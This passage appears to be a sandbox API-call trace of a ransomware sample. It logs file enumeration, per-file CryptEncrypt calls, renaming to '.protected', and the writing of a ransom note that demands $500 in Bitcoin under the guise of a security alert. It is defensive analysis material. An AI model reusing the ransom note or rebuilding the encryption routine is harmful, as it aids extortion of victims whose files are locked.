(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.973] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.973] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.973] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.973] CloseHandle (hObject=0x164) returned 1 [0078.974] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0078.974] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0078.974] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned 141 [0078.974] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0078.974] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0078.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*") returned 143 [0078.974] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.974] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.974] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.974] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.974] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.974] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\.") returned 143 [0078.974] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.974] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.974] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.974] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.974] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.974] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.974] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\..") returned 144 [0078.975] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.975] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.975] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.975] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.975] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.975] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.975] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.975] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.975] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.976] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.976] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.976] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.976] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.977] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.977] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.977] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.977] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.977] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.977] CloseHandle (hObject=0x168) returned 1 [0078.977] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.protected") returned 165 [0078.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.protected")) returned 1 [0078.977] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.978] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.978] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0078.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.978] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.978] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.978] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.979] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.979] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.979] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.979] CloseHandle (hObject=0x164) returned 1 [0078.979] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0078.979] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0078.979] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned 142 [0078.979] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0078.979] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0078.979] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*") returned 144 [0078.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.979] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.979] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.979] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.979] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.979] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.979] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\.") returned 144 [0078.979] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.979] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.979] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.979] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.980] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.980] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.980] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.980] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\..") returned 145 [0078.980] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.980] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.980] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.980] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.980] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.980] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.980] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.980] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.980] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.980] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0078.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.981] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0078.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.981] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.981] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.982] CloseHandle (hObject=0x168) returned 1 [0078.982] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.protected") returned 166 [0078.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.protected")) returned 1 [0078.982] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.982] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.982] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0078.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.982] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.982] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.983] lstrlenA 